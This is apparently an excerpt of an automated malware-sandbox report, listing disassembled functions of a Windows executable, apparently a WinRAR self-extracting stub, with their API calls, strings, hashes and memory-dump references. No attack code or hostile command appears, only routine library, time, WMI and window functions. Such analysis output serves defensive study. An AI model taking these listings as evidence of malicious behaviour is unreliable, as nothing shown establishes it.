API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: e7798d8fa0a0e45d77485bb921535d3dddbaf5ca472d3b99e899f23cc81d5a45
Instruction ID: d0ccc7393f8db45078e22d7ec699179ba412265201331c0222b96fc602df71c0
Opcode Fuzzy Hash: e7798d8fa0a0e45d77485bb921535d3dddbaf5ca472d3b99e899f23cc81d5a45
Instruction Fuzzy Hash: B321A336644209BBDA11DFE6ED49F7B3B6DFB8BB91F014114F701D60A0CB5299029731

Function 009FFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,03DAED87,00000001,00000000,00000000,?,?,009EAF6C,ROOT\CIMV2), ref: 009FFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,009EAF6C,ROOT\CIMV2), ref: 009FFE14
SysAllocString.OLEAUT32(00000000), ref: 009FFE1F
_com_issue_error.COMSUPP ref: 009FFE48
_com_issue_error.COMSUPP ref: 009FFE52
GetLastError.KERNEL32(80070057,03DAED87,00000001,00000000,00000000,?,?,009EAF6C,ROOT\CIMV2), ref: 009FFE57
_com_issue_error.COMSUPP ref: 009FFE6A
GetLastError.KERNEL32(00000000,?,?,009EAF6C,ROOT\CIMV2), ref: 009FFE80
_com_issue_error.COMSUPP ref: 009FFE93

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 5416676be17c32ec70dbe5b98ea1284e6af07c9b4db86de69477e61954e64703
Instruction ID: 08157ee37c869e2e92f3bd1c3a1ec9e87481f8868243d7444920b78511b5af65
Opcode Fuzzy Hash: 5416676be17c32ec70dbe5b98ea1284e6af07c9b4db86de69477e61954e64703
Instruction Fuzzy Hash: 7641E972A0021DABDB10DFA4DC55BFEBBA8EF48710F248279FA15E7291D734990087A4

Function 009EAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009EAF29

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 009EAFCA
Windows 10, xrefs: 009EB0C2
WQL, xrefs: 009EAFDC
ROOT\CIMV2, xrefs: 009EAF5C
Name, xrefs: 009EB0B0

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 7a3340eb1823da287ab0a039367b1bab7ac5375672ead3e7c03581096b42660d
Instruction ID: af0aa63c4fc11dd55711415d2c891fc52bb96b3ee50017fd3f5987a8b9d61bc2
Opcode Fuzzy Hash: 7a3340eb1823da287ab0a039367b1bab7ac5375672ead3e7c03581096b42660d
Instruction Fuzzy Hash: 9D716B71A00259AFDF15DFA5CC95AAFBBB9FF88310B04455DE512A72A0CB70AD42CB60

Function 009E9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 009E93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 009E93C9

Part of subcall function 009EC29A: _wcslen.LIBCMT ref: 009EC2A2

Part of subcall function 009F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,009EC116,00000000,.exe,?,?,00000800,?,?,?,009F8E3C), ref: 009F1FD1

_swprintf.LIBCMT ref: 009E9465

Part of subcall function 009E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E40A5

MoveFileW.KERNEL32(?,?), ref: 009E94D4
MoveFileW.KERNEL32(?,?), ref: 009E9514

Strings

rtmp%d, xrefs: 009E944E

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: d981df05b2fe4a4c98833bba03fcf0ff2b8d0d7dbb937aa83a8003aa204ad906
Instruction ID: 9b3b41b258c2378ac008f2b8f9afbbf743a4e7d39dd18662b4cc8a830c7c7849
Opcode Fuzzy Hash: d981df05b2fe4a4c98833bba03fcf0ff2b8d0d7dbb937aa83a8003aa204ad906
Instruction Fuzzy Hash: F1416BB1900199A5DF22EBA1CC45FEE777CAF85340F0048A5BA55E3151EF389F89CB60

Function 009F1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 009F122E

Part of subcall function 009EB146: GetVersionExW.KERNEL32(?), ref: 009EB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 009F1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 009F1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 009F1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 009F1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 009F1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 009F12CF
__aullrem.LIBCMT ref: 009F1379

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 5c8f39e87e79a443ff68829bc6c7eb13b0652f85374a06fbedaa25d1132e09a7
Instruction ID: 97885efd80a3b899a9637786891db53d6ea7abe929966ce6623e22ea01d5d386
Opcode Fuzzy Hash: 5c8f39e87e79a443ff68829bc6c7eb13b0652f85374a06fbedaa25d1132e09a7
Instruction Fuzzy Hash: FF410AB6548345AFC710DF65C8849ABBBF9FF88314F048A2EF696C2210E774E549CB51

Function 009E2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 009E2536

Part of subcall function 009E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E40A5

Part of subcall function 009F05DA: _wcslen.LIBCMT ref: 009F05E0

Strings

;%u, xrefs: 009E2523
x%u, xrefs: 009E26FD
xc%u, xrefs: 009E275A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: c05e00f5a6ffcd406a27712a2315afbeef906af98c146378acf32c859708350c
Instruction ID: 13de8ac7cf14b642d2d2e170cda23b5aaf2ffde12da279fb9611128faa7e7ee4
Opcode Fuzzy Hash: c05e00f5a6ffcd406a27712a2315afbeef906af98c146378acf32c859708350c
Instruction Fuzzy Hash: 67F1F5B16043C09BDB27DB268895BFA779D6FD4300F080969FDC69B283CB649D45C762

Function 009F9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009F9D0A

Strings

<style>, xrefs: 009F9E30
</p>, xrefs: 009F9DE8
>, xrefs: 009F9D4B
</style>, xrefs: 009F9E52
<br>, xrefs: 009F9DFE

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 502c56fd174550975d880a6cb86c67eff89407f7e6f984f22c8836223f5aef8b
Instruction ID: 23bb3b36bca80133f9f42ed5e7943e8f7c0963047aa4b084f6af5160af431d06
Opcode Fuzzy Hash: 502c56fd174550975d880a6cb86c67eff89407f7e6f984f22c8836223f5aef8b
Instruction Fuzzy Hash: F4512A66B4132F95DB309A299C1177673E8DFA5750F79082AFFC18B1C0FB658C818361

Function 00A0F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00A0FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00A0F6CF
__fassign.LIBCMT ref: 00A0F74A
__fassign.LIBCMT ref: 00A0F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00A0F78B
WriteFile.KERNEL32(?,00000000,00000000,00A0FE02,00000000,?,?,?,?,?,?,?,?,?,00A0FE02,00000000), ref: 00A0F7AA
WriteFile.KERNEL32(?,00000000,00000001,00A0FE02,00000000,?,?,?,?,?,?,?,?,?,00A0FE02,00000000), ref: 00A0F7E3

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 8651ecca79ecda2f71fec6ec045fc2f8ac7430cc0cd7a8299fb536057e7be9e2
Instruction ID: 0fbfa41589f35aa41d81fa95aa5a063acc54fbc9cc241baf449f47b4244ae007
Opcode Fuzzy Hash: 8651ecca79ecda2f71fec6ec045fc2f8ac7430cc0cd7a8299fb536057e7be9e2
Instruction Fuzzy Hash: 4951A6B5E002499FCB20CFA4EC45AEEBBF4EF49300F14816AE555F7291D770AA45CBA1

Function 00A02900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A02937
___except_validate_context_record.LIBVCRUNTIME ref: 00A0293F
_ValidateLocalCookies.LIBCMT ref: 00A029C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00A029F3
_ValidateLocalCookies.LIBCMT ref: 00A02A48

Strings

csm, xrefs: 00A029DD

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9e96d343ba176ce26bb95aae2c003bcd83c187ab43e5885b5bb4c117b6615942
Instruction ID: 3e147f75a33705676a1c9a85909edbc8519875abf1fcdcef66fa02bd1af43008
Opcode Fuzzy Hash: 9e96d343ba176ce26bb95aae2c003bcd83c187ab43e5885b5bb4c117b6615942
Instruction Fuzzy Hash: B141BF35A0030CAFCF10DF68D889BAEBBB5AF84364F148065E815AB3D2D771DA55CB90

Function 009F9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 009F9EEE
GetWindowRect.USER32(?,00000000), ref: 009F9F44
ShowWindow.USER32(?,00000005,00000000), ref: 009F9FDB
SetWindowTextW.USER32(?,00000000), ref: 009F9FE3
ShowWindow.USER32(00000000,00000005), ref: 009F9FF9

Strings

RarHtmlClassName, xrefs: 009F9FA5

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 7814d966391593753eb94ec3cad78d0e5512e903db46a128c9cf20bbdd0d608b
Instruction ID: cf789939ae673821a57109d789cb0e1c7ee2c92f231023ab6b0dce64e3aa326b
Opcode Fuzzy Hash: 7814d966391593753eb94ec3cad78d0e5512e903db46a128c9cf20bbdd0d608b
Instruction Fuzzy Hash: 9141C376004218AFCF219FA8EC48F6B7BA8FF89701F048659FA4999056CB35ED05CB65

Function 009F9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009F995E
_wcslen.LIBCMT ref: 009F9993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 009F9987
, xrefs: 009F99B0
<br>, xrefs: 009F99DF
 , xrefs: 009F9A21

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 05e8f80546e8c2dbceee2c61a8da8a5a1dde2568f02ef8b4c5ce4c6083afa0b0
Instruction ID: 51bf2ca7fcc8e7316ba6b7489afd32072df202573e3be9e9634771acbd9ed31e
Opcode Fuzzy Hash: 05e8f80546e8c2dbceee2c61a8da8a5a1dde2568f02ef8b4c5ce4c6083afa0b0
Instruction Fuzzy Hash: 0731943664434D66DA30AF54AD42B7773ECEB90320F50882FF686572D0FB95ED9083A1

Function 00A0C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A0C868: _free.LIBCMT ref: 00A0C891

_free.LIBCMT ref: 00A0C8F2

Part of subcall function 00A08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34), ref: 00A08DE2
Part of subcall function 00A08DCC: GetLastError.KERNEL32(00A13A34,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34,00A13A34), ref: 00A08DF4

_free.LIBCMT ref: 00A0C8FD
_free.LIBCMT ref: 00A0C908
_free.LIBCMT ref: 00A0C95C
_free.LIBCMT ref: 00A0C967
_free.LIBCMT ref: 00A0C972
_free.LIBCMT ref: 00A0C97D

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: bc93690d34f9dc7aeb4da341d03ad04bc4f514a31e7f41ea310b72f11d4a3d55
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: A4113371590B0DBAE520B7B1ED07FCB7BAC9F04B10F408E15B2DD660D2DA79B5098754

Function 009FE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,009FE669,009FE5CC,009FE86D), ref: 009FE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 009FE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 009FE630

Strings

AcquireSRWLockExclusive, xrefs: 009FE615
ReleaseSRWLockExclusive, xrefs: 009FE625
KERNEL32.DLL, xrefs: 009FE600

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: a7a3c0e504fa93fe4bc00d4f30b6f2588ffb6cba08db0f5130efe1897da85c56
Instruction ID: 7afdbf08144d7a1b3abad83b5068eb04d0e9e9bb53ee121383a052dfc7cbb7dc
Opcode Fuzzy Hash: a7a3c0e504fa93fe4bc00d4f30b6f2588ffb6cba08db0f5130efe1897da85c56
Instruction Fuzzy Hash: AAF0F636B8032E9B0F21CFF45CC89BA23CE6A697553004C3ADB05D7130EB14CC925B90

Function 009F146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 009F14C2

Part of subcall function 009EB146: GetVersionExW.KERNEL32(?), ref: 009EB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009F14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 009F1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 009F1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 009F1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 009F1533

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: b0d5683e5e5e3a475f597b85ba653792bba7a9a37d2b1c05549062db8e9ab68b
Instruction ID: e7573f0ecf46f725f779ab3b756c995cf2067b2a4088fb2da2287e9d5703b0b9
Opcode Fuzzy Hash: b0d5683e5e5e3a475f597b85ba653792bba7a9a37d2b1c05549062db8e9ab68b
Instruction Fuzzy Hash: 4231EA7A108345ABCB04DFA8C88499BB7F8BF98754F008A1EF995C3210E730D549CBA6

Function 00A02AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A02AF1,00A002FC,009FFA34), ref: 00A02B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A02B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A02B2F
SetLastError.KERNEL32(00000000,00A02AF1,00A002FC,009FFA34), ref: 00A02B81

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e7c700207026ba6417d843c8875350c6ffdb6a8136af346c901c41d7763dabfe
Instruction ID: c638df5e95f51f4d25a864048e613843e53b84f2bbe7811cd222b8722a8d9542
Opcode Fuzzy Hash: e7c700207026ba6417d843c8875350c6ffdb6a8136af346c901c41d7763dabfe
Instruction Fuzzy Hash: F601D43311831A6EFA25AFB47C8DBA63B99EB027B47604739F910950E0EF114C01A344

Function 00A097E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00A21030,00A04674,00A21030,?,?,00A03F73,00000050,?,00A21030,00000200), ref: 00A097E9
_free.LIBCMT ref: 00A0981C
_free.LIBCMT ref: 00A09844
SetLastError.KERNEL32(00000000,?,00A21030,00000200), ref: 00A09851
SetLastError.KERNEL32(00000000,?,00A21030,00000200), ref: 00A0985D
_abort.LIBCMT ref: 00A09863

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
